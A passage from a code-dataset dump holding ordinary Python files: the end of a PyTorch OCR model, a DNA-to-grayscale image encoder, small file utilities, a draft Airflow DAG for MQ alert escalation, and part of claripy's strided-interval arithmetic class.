nn.Conv2d(channels, channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(channels),\n nn.LeakyReLU(0.1),\n )\n\n def forward(self, input_):\n return self.layer(input_) + input_\n\n\nclass BottleBlock(nn.Module):\n def __init__(\n self,\n *,\n channels,\n fmap_size,\n heads=8,\n dim_head=128,\n is_abs=True,\n activation=nn.LeakyReLU(0.1)\n ):\n super().__init__()\n\n self.net = nn.Sequential(\n nn.Conv2d(channels, 2*channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(2*channels),\n activation,\n MultiHeadSelfAttention(2*channels, fmap_size, heads, dim_head),\n nn.Conv2d(2*channels, channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(channels),\n )\n\n self.activation = activation\n\n def forward(self, x):\n x = self.net(x)+x\n return self.activation(x)\n\n\nclass OcrNet(nn.Module):\n\n def __init__(self, num_class):\n super(OcrNet, self).__init__()\n self.cnn = nn.Sequential(\n nn.BatchNorm2d(3),\n DownSample(3, 64),\n ResBlock(64),\n ResBlock(64),\n nn.Conv2d(64, 128, 3, 2, 1, bias=False),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.1),\n ResBlock(128),\n ResBlock(128),\n nn.Conv2d(128, 256, 3, 2, 1, bias=False),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.1),\n BottleBlock(channels=256, fmap_size=(6,18)),\n BottleBlock(channels=256, fmap_size=(6, 18)),\n BottleBlock(channels=256, fmap_size=(6, 18)),\n nn.Conv2d(256, 512, 3, (2, 1), 1, bias=False),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.1),\n nn.Conv2d(512, 512, 3, 1, (0,1), bias=False),\n )\n self.rnn = nn.Sequential(\n BidirectionalLSTM(512,256,128),\n BidirectionalLSTM(128,128,num_class)\n )\n\n def forward(self, input_):\n '''input_ of shape (3,48,144)'''\n input_ = self.cnn(input_)\n n, c, h, w = input_.shape # n,c,h,w\n assert h == 1\n input_ = rearrange(input_, 'n c h w -> w n (c h)')\n return self.rnn(input_)\n\n\nif __name__ == '__main__':\n m = OcrNet(70)\n x = torch.randn(36, 3, 48, 144)\n print(m(x).shape)\n","sub_path":"models/ocr_net.py","file_name":"ocr_net.py","file_ext":"py","file_size_in_byte":9034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"458293222","text":"import os\nfrom os import listdir\nfrom os.path import isfile, join\nfrom PIL import Image\nimport numpy as np\n\ndirectory='Output_Grayscale_img'\nmasterpath='data'\nif not os.path.exists(directory):\n os.makedirs(directory)\n\ndef Encode_Grayscale(masterpath):\n mypath=masterpath\n\n w, h = 1024,1024 \n w2, h2 = 64,64\n my_list = os.listdir(mypath)\n for i in range(len(my_list)):\n Subpath=mypath+'/'+my_list[i]\n imgpath=my_list[i]\n onlyfiles = [f for f in listdir(Subpath) if isfile(join(Subpath, f))]\n for s in range(0,len(onlyfiles)):\n\n data = np.zeros((h, w), dtype=np.uint8)\n\n x=''\n with open(Subpath + '/' + onlyfiles[s]) as f:\n content = f.readlines()\n\n content = [x.strip() for x in content] \n for k in range(1,len(content)):\n x+=content[k]\n i=int(w/2)-1\n j=int(h/2)-1\n\n for k in range (0,len(x)):\n if x[k]=='A' or x[k]=='a':\n i-=1\n j-=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='C' or x[k]=='c':\n i-=1\n j+=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='G' or x[k]=='g':\n i+=1\n j-=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n if x[k]=='T' or x[k]=='t':\n i+=1\n j+=1\n if(i==-1 or i==w or j==-1 or j==h):\n i=int((w/2)-1)\n j=int((h/2)-1)\n data[i,j]+=255\n\n\n img = Image.fromarray(data)\n new_image = img.resize((w2,h2))\n\n\n if not os.path.exists(directory+'/'+imgpath):\n os.makedirs(directory+'/'+imgpath)\n\n imagepath=directory+'/'+imgpath+'/'+onlyfiles[s]+'.png'\n new_image.save(imagepath)\n\nif __name__ == '__main__':\n Encode_Grayscale(masterpath)\n","sub_path":"Source Code/WalkIm_Grayscale_Encoding.py","file_name":"WalkIm_Grayscale_Encoding.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"641867865","text":"import os\n\ndef remove_dup(file_name):\n # read content\n file = open(file_name, 'r')\n lines = file.readlines()\n file.close()\n # erase and write new content\n file = open(file_name, 'w')\n unique = set(lines)\n for item in unique:\n file.write(item)\n file.close()\n\ndef add_query_time(filename):\n time = 0\n file = open(filename, 'r')\n tag_time = \"\\\"took\\\"\"\n for line in file:\n if line.find(tag_time) != -1:\n line = line.strip()\n line = line.split(\":\")[1]\n line = line.replace('\\\"', '')\n line = line.replace(',', '')\n time += int(line)\n print(\"time in file: \" + str(time))\n return time","sub_path":"query2/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"539502707","text":"from airflow import DAG\nimport subprocess\n\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\n\n\ndef check_prodId_access_func(**kwargs):\n ti = kwargs['ti']\n has_access = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if has_access == 1:\n return 'get_cur_MQ_depth_max_MQ_depth'\n else:\n return 'L1_escalation'\n\ndef is_MQ_depth_below_threshold_func1(**kwargs):\n ti = kwargs['ti']\n current_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n threshold_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if current_mq_depth < threshold_mq_depth:\n return 'resolution_module'\n else:\n return ''\n\ndef is_IPcmdb_ACTION_func(**kwargs):\n ti = kwargs['ti']\n action = ti.xcom_pull(task_ids='IPcmdb_ACTION', key='IPcmdb_ACTION')\n\n if action == 'ESCALATE':\n return 'L2_escalation'\n elif action == 'REPLY':\n return 'dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir'\n elif action == 'DUMP':\n return 'check_bailout_message_count_has_reached'\n elif action == 'MONITOR':\n return 'monitor_for_specific_time_based_on_freq'\n\n\ndef cycle_reply(**kwargs):\n\n while True:\n\n is_maching = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir\n\n # ti = kwargs['ti']\n # msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir', key='msg_id')\n # todo based on values it returns\n\n if is_maching:\n return 'L2_escalation'\n else:\n val = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for replay_err_msgs_err_q_to_process\n\n val2 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for wait_for_configured_time\n\n val3 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for check_backout_msgs_func\n\n if val3:\n val4 = subprocess.run([\"ls\", \"-l\"], capture_output=True) # replaced for BRANCH_compare_each_msgid_w_files_in_that_dir2\n else:\n return 'resolution_module'\n\n\ndef compare_each_msgid_w_files_in_that_dir_func(**kwargs):\n ti = kwargs['ti']\n msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir', key='msg_id')\n\n # todo based on values it returns\n is_maching = True\n if is_maching:\n return 'L2_escalation'\n else:\n\n return 'replay_err_msgs_err_q_to_process'\n\ndef compare_each_msgid_w_files_in_that_dir2_func(**kwargs):\n ti = kwargs['ti']\n msg_ids = ti.xcom_pull(task_ids='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2', key='msg_id')\n\n # todo based on values it returns\n is_maching = True\n if is_maching:\n return 'L2_escalation'\n else:\n return 'replay_err_msgs_err_q_to_process'\n\n# def check_backout_msgs_func(**kwargs):\n# ti = kwargs['ti']\n# msg_ids = ti.xcom_pull(task_ids='# todo', key='msg_id')\n#\n# backout_message_result = True\n#\n# if backout_message_result:\n# return 'dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir'\n# else:\n# return 'resolution_module'\n\ndef check_bailout_message_count_has_reached_func(**kwargs):\n ti = kwargs['ti']\n count = ti.xcom_pull(task_ids='# todo may be new tas kto get data', key='disk_space')\n\n if count > 0: # todo fix numbers\n return 'L2_escalation'\n else:\n return 'check_disk_space'\n\ndef is_disk_space_func(**kwargs):\n\n ti = kwargs['ti']\n disk_space = ti.xcom_pull(task_ids='check_disk_space', key='disk_space')\n destroy = True # todo get this value\n\n if disk_space > 80:\n return 'L2_escalation'\n elif destroy:\n return 'dump_and_destroy_a_copy_of_msgs_from_QUEUE'\n else:\n return 'dump_a_copy_of_msgs_from_QUEUE'\n\ndef is_destroy(**kwargs):\n\n # todo get from bash execution the destroy value\n\n destroy = True\n\n if destroy:\n return 'dump_and_destroy_a_copy_of_msgs_from_QUEUE'\n else:\n return 'dump_a_copy_of_msgs_from_QUEUE'\n\ndef is_MQ_depth_below_threshold_func(**kwargs):\n ti = kwargs['ti']\n current_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n threshold_mq_depth = ti.xcom_pull(task_ids='check_prodId_access', key='prodId_access')\n\n if current_mq_depth < threshold_mq_depth:\n return 'resolution_module'\n else:\n return 'L2_escalation'\n\n\n\n\ndefault_arg = {'owner': 'airflow', 'start_date': '2020-12-10'}\n\ndag = DAG(\n 'mq_modified',\n default_args=default_arg,\n schedule_interval=None,\n catchup=False,\n concurrency=1,\n max_active_runs=1\n)\n\nown_sock_alert = BashOperator(\n dag=dag,\n task_id='own_sock_alert',\n bash_command='echo 1',\n)\n\nfetch_alert_details = BashOperator(\n dag=dag,\n task_id='fetch_alert_details',\n bash_command='echo 2',\n)\n\nfetch_config_details_from_ipcmdb = BashOperator(\n dag=dag,\n task_id='fetch_config_details_from_ipcmdb',\n bash_command='echo 2',\n)\n\n############# PSW\n\ncheck_prodId_access = BashOperator( # maybe we dont need this step if fetch_config_details_from_ipcmdb task provide access details. So xcom_push can be done there.\n dag=dag,\n task_id='check_prodId_access',\n # bash_command='echo \"{{ ti.xcom_push(key=\"k1\", value=\"v1\") }}\" \"{{ti.xcom_push(key=\"k2\", value=\"v2\") }}\"',\n bash_command='echo \"{{ ti.xcom_push(key=\"prodId_access\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_check_prodId_access = BranchPythonOperator(\n task_id='BRANCH_check_prodId_access',\n dag=dag,\n python_callable=check_prodId_access_func,\n)\n\nget_cur_MQ_depth_max_MQ_depth = BashOperator(\n dag=dag,\n task_id='get_cur_MQ_depth_max_MQ_depth',\n bash_command='echo \"{{ ti.xcom_push(key=\"current_mq_depth\", value=\"#todo\") }}\" \"{{ti.xcom_push(key=\"threshold_mq_depth\", value=\"#todo\") }}\"',\n)\n\n#############\n\nL1_escalation = BashOperator(\n dag=dag,\n task_id='L1_escalation',\n bash_command='echo 2',\n)\n\nBRANCH_is_MQ_depth_below_threshold1 = BranchPythonOperator(\n task_id='BRANCH_is_MQ_depth_below_threshold1',\n dag=dag,\n python_callable=is_MQ_depth_below_threshold_func1,\n)\n\nresolution_module = BashOperator(\n dag=dag,\n task_id='resolution_module',\n bash_command='echo 2',\n)\n############# ACTIONS\n\n\nIPcmdb_ACTION = BashOperator( # Not sure if the cvalue of ACTION can be taken from task fetch_config_details_from_ipcmdb ??\n dag=dag,\n task_id='IPcmdb_ACTION',\n bash_command='echo \"{{ ti.xcom_push(key=\"IPcmdb_ACTION\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_ipcmdb_action = BranchPythonOperator(\n task_id='BRANCH_ipcmdb_action',\n dag=dag,\n python_callable=is_IPcmdb_ACTION_func,\n)\n\n## ESCALATE\n\nL2_escalation = BashOperator(\n dag=dag,\n task_id='L2_escalation',\n bash_command='echo 2',\n)\n\n## MONITOR\n\nmonitor_for_specific_time_based_on_freq = BashOperator(\n dag=dag,\n task_id='monitor_for_specific_time_based_on_freq',\n bash_command='echo 2',\n)\n\n## REPLY\n\n# dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir = BashOperator(\n# dag=dag,\n# task_id='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir',\n# bash_command='echo \"{{ ti.xcom_push(key=\"msg_id\", value=\" #todo later set this from script\") }}\"',\n# )\n\nBRANCH_cycle_reply = BranchPythonOperator(\n task_id='BRANCH_cycle_reply',\n dag=dag,\n python_callable=compare_each_msgid_w_files_in_that_dir_func,\n)\n\n# dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2 = BashOperator(\n# dag=dag,\n# task_id='dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2',\n# bash_command='echo \"{{ ti.xcom_push(key=\"msg_id\", value=\" #todo later set this from script\") }}\"',\n# )\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir = BranchPythonOperator(\n# task_id='BRANCH_compare_each_msgid_w_files_in_that_dir',\n# dag=dag,\n# python_callable=compare_each_msgid_w_files_in_that_dir_func,\n# )\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir2 = BranchPythonOperator(\n# task_id='BRANCH_compare_each_msgid_w_files_in_that_dir2',\n# dag=dag,\n# python_callable=compare_each_msgid_w_files_in_that_dir2_func,\n# )\n#\n# replay_err_msgs_err_q_to_process = BashOperator(\n# dag=dag,\n# task_id='replay_err_msgs_err_q_to_process',\n# bash_command='echo 2',\n# )\n#\n# wait_for_configured_time = BashOperator(\n# dag=dag,\n# task_id='wait_for_configured_time',\n# bash_command='echo 2',\n# )\n#\n# BRANCH_check_backout_msgs = BranchPythonOperator(\n# task_id='BRANCH_check_backout_msgs',\n# dag=dag,\n# python_callable=check_backout_msgs_func,\n# )\n\n\n## DUMP\n\nBRANCH_check_bailout_message_count_has_reached = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_check_bailout_message_count_has_reached',\n python_callable=check_bailout_message_count_has_reached_func,\n)\n\ncheck_disk_space = BashOperator(\n dag=dag,\n task_id='check_disk_space',\n bash_command='echo \"{{ ti.xcom_push(key=\"disk_space\", value=\" #todo later set this from script\") }}\"',\n)\n\nBRANCH_is_disk_space = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_is_disk_space',\n python_callable=is_disk_space_func,\n)\n\nBRANCH_is_destroy = BranchPythonOperator(\n dag=dag,\n task_id='BRANCH_is_destroy',\n python_callable=is_destroy,\n)\n\ndump_and_destroy_a_copy_of_msgs_from_QUEUE = BashOperator(\n dag=dag,\n task_id='dump_and_destroy_a_copy_of_msgs_from_QUEUE',\n bash_command='echo 2',\n)\n\ndump_a_copy_of_msgs_from_QUEUE = BashOperator(\n dag=dag,\n task_id='dump_a_copy_of_msgs_from_QUEUE',\n bash_command='echo 2',\n)\n\nnotification_to_dump_loc = BashOperator(\n dag=dag,\n task_id='notification_to_dump_loc',\n bash_command='echo 2',\n)\n\nBRANCH_is_MQ_depth_below_threshold = BranchPythonOperator(\n task_id='BRANCH_is_MQ_depth_below_threshold',\n dag=dag,\n python_callable=is_MQ_depth_below_threshold_func,\n)\n\nSTOP = DummyOperator(\n dag=dag,\n task_id='stop',\n)\n\n\nown_sock_alert >> fetch_alert_details >> fetch_config_details_from_ipcmdb >> check_prodId_access >> BRANCH_check_prodId_access\nBRANCH_check_prodId_access >> L1_escalation >> STOP\nBRANCH_check_prodId_access >> get_cur_MQ_depth_max_MQ_depth >> BRANCH_is_MQ_depth_below_threshold1\n\nBRANCH_is_MQ_depth_below_threshold1 >> resolution_module >> STOP\nBRANCH_is_MQ_depth_below_threshold1 >> IPcmdb_ACTION >> BRANCH_ipcmdb_action\n\n# ESCALATE\nBRANCH_ipcmdb_action >> L2_escalation >> STOP\n\n# REPLY\n# BRANCH_ipcmdb_action >> dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir >> BRANCH_compare_each_msgid_w_files_in_that_dir\n#\n# BRANCH_compare_each_msgid_w_files_in_that_dir >> replay_err_msgs_err_q_to_process >> wait_for_configured_time >> BRANCH_check_backout_msgs\n# BRANCH_check_backout_msgs >> dump_err_msgs_to_file_and_fetch_msgid_from_dump_dir2 >> BRANCH_compare_each_msgid_w_files_in_that_dir2 ## NOT ACYCLIC\n# BRANCH_check_backout_msgs >> resolution_module >> STOP\n\nBRANCH_ipcmdb_action >> BRANCH_cycle_reply\nBRANCH_cycle_reply >> resolution_module >> STOP\nBRANCH_cycle_reply >> L2_escalation >> STOP\n\n# MONITOR\nBRANCH_ipcmdb_action >> monitor_for_specific_time_based_on_freq >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_MQ_depth_below_threshold >> L2_escalation >> STOP\nBRANCH_is_MQ_depth_below_threshold >> resolution_module >> STOP\n#\n# DUMP\nBRANCH_ipcmdb_action >> BRANCH_check_bailout_message_count_has_reached\nBRANCH_check_bailout_message_count_has_reached >> L2_escalation >> STOP\nBRANCH_check_bailout_message_count_has_reached >> BRANCH_is_disk_space\nBRANCH_is_disk_space >> L2_escalation >> STOP\nBRANCH_is_disk_space >> BRANCH_is_destroy\nBRANCH_is_destroy >> dump_and_destroy_a_copy_of_msgs_from_QUEUE >> notification_to_dump_loc >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_destroy >> dump_a_copy_of_msgs_from_QUEUE >> notification_to_dump_loc >> BRANCH_is_MQ_depth_below_threshold\nBRANCH_is_MQ_depth_below_threshold >> L2_escalation >> STOP\nBRANCH_is_MQ_depth_below_threshold >> resolution_module >> STOP\n\n","sub_path":"mq_modified.py","file_name":"mq_modified.py","file_ext":"py","file_size_in_byte":12140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"564575549","text":"import fractions\nimport functools\nimport math\nimport itertools\nimport logging\n\nlogger = logging.getLogger('claripy.vsa.strided_interval')\n\nfrom ..backend_object import BackendObject\n\ndef reversed_processor(f):\n def processor(self, *args):\n if self._reversed:\n # Reverse it for real. We have to accept the precision penalty.\n reversed = self._reverse()\n return f(reversed, *args)\n return f(self, *args)\n\n return processor\n\ndef normalize_types(f):\n @functools.wraps(f)\n def normalizer(self, o):\n '''\n Convert any object to an object that we can process.\n '''\n # Special handler for union\n if f.__name__ == 'union' and isinstance(o, DiscreteStridedIntervalSet):\n return o.union(self)\n\n if isinstance(o, ValueSet) or isinstance(o, DiscreteStridedIntervalSet):\n # It should be put to o.__radd__(self) when o is a ValueSet\n return NotImplemented\n\n if isinstance(o, Base) or isinstance(self, Base):\n return NotImplemented\n if type(self) is BVV:\n self = self.value\n if type(o) is BVV:\n o = o.value\n if type(o) in (int, long):\n o = StridedInterval(bits=StridedInterval.min_bits(o), stride=0, lower_bound=o, upper_bound=o)\n if type(self) in (int, long):\n self = StridedInterval(bits=StridedInterval.min_bits(self), stride=0, lower_bound=self, upper_bound=self)\n\n if f.__name__ not in ('concat', ):\n # Make sure they have the same length\n common_bits = max(o.bits, self.bits)\n if o.bits < common_bits:\n o = o.zero_extend(common_bits)\n if self.bits < common_bits:\n self = self.zero_extend(common_bits)\n\n self_reversed = False\n\n if self._reversed != o._reversed:\n # We are working on two instances that have different endianness!\n # Make sure the `reversed` property of self is kept the same after operation\n if self._reversed:\n if o.is_integer:\n o = o._reverse()\n else:\n self_reversed = True\n self = self._reverse()\n\n else:\n # If self is an integer, we wanna reverse self as well\n if self.is_integer:\n self = self._reverse()\n self_reversed = True\n else:\n o = o._reverse()\n\n ret = f(self, o)\n if self_reversed and isinstance(ret, StridedInterval):\n ret = ret.reverse()\n return ret\n\n return normalizer\n\nsi_id_ctr = itertools.count()\n\n# Whether DiscreteStridedIntervalSet should be used or not. Sometimes we manually set it to False to allow easy\n# implementation of test cases.\nallow_dsis = False\n\nclass StridedInterval(BackendObject):\n \"\"\"\n A Strided Interval is represented in the following form:\n bits,stride[lower_bound, upper_bound]\n For more details, please refer to relevant papers like TIE and WYSINWYE.\n\n This implementation is signedness-agostic, please refer to _Signedness-Agnostic Program Analysis: Precise Integer\n Bounds for Low-Level Code_ by Jorge A. Navas, etc. for more details.\n\n Thanks all corresponding authors for their outstanding works.\n \"\"\"\n def __init__(self, name=None, bits=0, stride=None, lower_bound=None, upper_bound=None, uninitialized=False, bottom=False):\n self._name = name\n\n if self._name is None:\n self._name = \"SI_%d\" % si_id_ctr.next()\n\n self._bits = bits\n self._stride = stride if stride is not None else 1\n self._lower_bound = lower_bound if lower_bound is not None else 0\n self._upper_bound = upper_bound if upper_bound is not None else (2**bits-1)\n\n if lower_bound is not None and type(lower_bound) not in (int, long):\n raise ClaripyVSAError(\"'lower_bound' must be an int or a long. %s is not supported.\" % type(lower_bound))\n\n if upper_bound is not None and type(upper_bound) not in (int, long):\n raise ClaripyVSAError(\"'upper_bound' must be an int or a long. %s is not supported.\" % type(upper_bound))\n\n self._reversed = False\n\n self._is_bottom = bottom\n\n self.uninitialized = uninitialized\n\n if self._upper_bound is not None and bits == 0:\n self._bits = self._min_bits()\n\n if self._upper_bound is None:\n self._upper_bound = StridedInterval.max_int(self.bits)\n\n if self._lower_bound is None:\n self._lower_bound = StridedInterval.min_int(self.bits)\n\n # For lower bound and upper bound, we always store the unsigned version\n self._lower_bound = self._lower_bound & (2 ** bits - 1)\n self._upper_bound = self._upper_bound & (2 ** bits - 1)\n\n self.normalize()\n\n def copy(self):\n si = StridedInterval(name=self._name,\n bits=self.bits,\n stride=self.stride,\n lower_bound=self.lower_bound,\n upper_bound=self.upper_bound,\n uninitialized=self.uninitialized,\n bottom=self._is_bottom)\n si._reversed = self._reversed\n return si\n\n def nameless_copy(self):\n si = StridedInterval(name=None,\n bits=self.bits,\n stride=self.stride,\n lower_bound=self.lower_bound,\n upper_bound=self.upper_bound,\n uninitialized=self.uninitialized,\n bottom=self._is_bottom)\n si._reversed = self._reversed\n return si\n\n def normalize(self):\n if self.bits == 8 and self.reversed:\n self._reversed = False\n\n if self.is_empty:\n return self\n\n if self.lower_bound == self.upper_bound:\n self._stride = 0\n\n if self.lower_bound < 0:\n self.lower_bound = self.lower_bound & (2 ** self.bits - 1)\n\n self._normalize_top()\n\n if self._stride < 0:\n raise Exception(\"Why does this happen?\")\n\n return self\n\n def eval(self, n, signed=False):\n \"\"\"\n Evaluate this StridedInterval to obtain a list of concrete integers\n :param n: Upper bound for the number of concrete integers\n :param signed: Treat this StridedInterval as signed or unsigned\n :return: A list of at most `n` concrete integers\n \"\"\"\n\n results = [ ]\n\n if self.is_empty:\n # no value is available\n pass\n\n elif self.stride == 0 and n > 0:\n results.append(self.lower_bound)\n else:\n if signed:\n # View it as a signed integer\n bounds = self._signed_bounds()\n\n else:\n # View it as an unsigned integer\n bounds = self._unsigned_bounds()\n\n for lb, ub in bounds:\n while len(results) < n and lb <= ub:\n results.append(lb)\n lb += self.stride # It will not overflow\n\n return results\n\n #\n # Private methods\n #\n\n def __hash__(self):\n return hash((self.bits, self.lower_bound, self.upper_bound, self.stride, self._reversed, self.uninitialized))\n\n def _normalize_top(self):\n if self.lower_bound == self._modular_add(self.upper_bound, 1, self.bits) and self.stride == 1:\n # This is a TOP!\n # Normalize it\n self.lower_bound = 0\n self.upper_bound = self.max_int(self.bits)\n\n def _ssplit(self):\n \"\"\"\n Split `self` at the south pole, which is the same as in unsigned arithmetic\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n south_pole_right = self.max_int(self.bits) # 111...1\n # south_pole_left = 0\n\n # Is `self` straddling the south pole?\n if self.upper_bound < self.lower_bound:\n # It straddles the south pole!\n\n a_upper_bound = south_pole_right - ((south_pole_right - self.lower_bound) % self.stride)\n a = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=self.lower_bound, upper_bound=a_upper_bound)\n\n b_lower_bound = self._modular_add(a_upper_bound, self.stride, self.bits)\n b = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=b_lower_bound, upper_bound=self.upper_bound)\n\n return [ a, b ]\n\n else:\n return [ self.copy() ]\n\n def _nsplit(self):\n \"\"\"\n Split `self` at the north pole, which is the same as in signed arithmetic\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n north_pole_left = self.max_int(self.bits - 1) # 01111...1\n north_pole_right = 2 ** (self.bits - 1) # 1000...0\n\n # Is `self` straddling the north pole?\n straddling = False\n if self.upper_bound >= north_pole_right:\n if self.lower_bound > self.upper_bound:\n # Yes it does!\n straddling = True\n elif self.lower_bound <= north_pole_left:\n straddling = True\n\n else:\n if self.lower_bound > self.upper_bound and self.lower_bound <= north_pole_left:\n straddling = True\n\n if straddling:\n a_upper_bound = north_pole_left - ((north_pole_left - self.lower_bound) % self.stride)\n a = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=self.lower_bound, upper_bound=a_upper_bound)\n\n b_lower_bound = a_upper_bound + self.stride\n b = StridedInterval(bits=self.bits, stride=self.stride, lower_bound=b_lower_bound, upper_bound=self.upper_bound)\n\n return [ a, b ]\n\n else:\n return [ self.copy() ]\n\n def _psplit(self):\n \"\"\"\n Split `self` at both north and south poles\n\n :return: A list of split StridedIntervals\n \"\"\"\n\n nsplit_list = self._nsplit()\n psplit_list = [ ]\n\n for si in nsplit_list:\n psplit_list.extend(si._ssplit())\n\n return psplit_list\n\n def _signed_bounds(self):\n \"\"\"\n Get lower bound and upper bound for `self` in signed arithmetic\n :return: a list of (lower_bound, upper_bound) tuples\n \"\"\"\n\n nsplit = self._nsplit()\n if len(nsplit) == 1:\n lb = nsplit[0].lower_bound\n ub = nsplit[0].upper_bound\n\n lb = self._unsigned_to_signed(lb, self.bits)\n ub = self._unsigned_to_signed(ub, self.bits)\n\n return [ (lb, ub) ]\n\n elif len(nsplit) == 2:\n # nsplit[0] is on the left hemisphere, and nsplit[1] is on the right hemisphere\n\n # The left one\n lb_1 = nsplit[0].lower_bound\n ub_1 = nsplit[0].upper_bound\n\n # The right one\n lb_2 = nsplit[1].lower_bound\n ub_2 = nsplit[1].upper_bound\n # Then convert them to negative numbers\n lb_2 = self._unsigned_to_signed(lb_2, self.bits)\n ub_2 = self._unsigned_to_signed(ub_2, self.bits)\n\n return [ (lb_1, ub_1), (lb_2, ub_2) ]\n else:\n raise Exception('WTF')\n\n def _unsigned_bounds(self):\n \"\"\"\n Get lower bound and upper bound for `self` in unsigned arithmetic\n :return: a list of (lower_bound, upper_bound) tuples\n \"\"\"\n\n ssplit = self._ssplit()\n if len(ssplit) == 1:\n lb = ssplit[0].lower_bound\n ub = ssplit[0].upper_bound\n\n return [ (lb, ub) ]\n elif len(ssplit) == 2:\n # ssplit[0] is on the left hemisphere, and ssplit[1] is on the right hemisphere\n\n lb_1 = ssplit[0].lower_bound\n ub_1 = ssplit[0].upper_bound\n\n lb_2 = ssplit[1].lower_bound\n ub_2 = ssplit[1].upper_bound\n\n return [ (lb_1, ub_1), (lb_2, ub_2) ]\n else:\n raise Exception('WTF')\n\n #\n # Comparison operations\n #\n\n def identical(self, o):\n \"\"\"\n Used to make exact comparisons between two StridedIntervals. Usually it is only used in test cases.\n\n :param o: The other StridedInterval to compare with\n :return: True if they are exactly same, False otherwise\n \"\"\"\n\n if (self.bits == o.bits and\n self.stride == o.stride and\n self.lower_bound == o.lower_bound and\n self.upper_bound == o.upper_bound):\n return True\n\n else:\n return False\n\n @normalize_types\n def SLT(self, o):\n \"\"\"\n Signed less than\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = [ ]\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if ub_1 < lb_2:\n ret.append(TrueResult())\n elif lb_1 >= ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SLE(self, o):\n \"\"\"\n Signed less than or equal to\n\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if ub_1 <= lb_2:\n ret.append(TrueResult())\n elif lb_1 > ub_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SGT(self, o):\n \"\"\"\n Signed greater than\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n signed_bounds_1 = self._signed_bounds()\n signed_bounds_2 = o._signed_bounds()\n\n ret = []\n for lb_1, ub_1 in signed_bounds_1:\n for lb_2, ub_2 in signed_bounds_2:\n if lb_1 > ub_2:\n ret.append(TrueResult())\n elif ub_1 <= lb_2:\n ret.append(FalseResult())\n else:\n ret.append(MaybeResult())\n\n if all(r.identical(TrueResult()) for r in ret):\n return TrueResult()\n elif all(r.identical(FalseResult()) for r in ret):\n return FalseResult()\n else:\n return MaybeResult()\n\n @normalize_types\n def SGE(self, o):\n \"\"\"\n Signed greater than or equal to\n :param o: The other operand\n :return: TrueResult(), FalseResult(), or MaybeResult()\n \"\"\"\n\n 